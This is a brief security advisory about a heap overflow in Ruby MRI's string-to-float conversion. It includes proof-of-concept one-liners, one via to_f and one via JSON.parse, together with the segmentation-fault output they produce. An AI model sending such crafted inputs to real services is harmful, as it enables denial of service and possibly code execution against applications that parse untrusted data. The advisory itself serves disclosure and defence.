Any time a string is converted to a floating point value, a specially crafted string can cause a heap overflow. This can lead to a denial of service attack via segmentation faults and possibly arbitrary code execution. Any program that converts input of unknown origin to floating point values (especially common when accepting JSON) are vulnerable.
A couple of PoCs (only affecting MRI).
# PoC
("0."+"1"*300000).to_f
$ ruby -e '("0."+"1"*300000).to_f'
[1] 9352 segmentation fault (core dumped) ruby -e '("1."+"1"*300000).to_f'
irb(main):001:0> require 'json'
=> true
irb(main):002:0> JSON.parse("[0."+"1"*300000+"]").to_f
[1] 9182 segmentation fault (core dumped) irb
Published on 22 Nov 2013 by Stanley Tan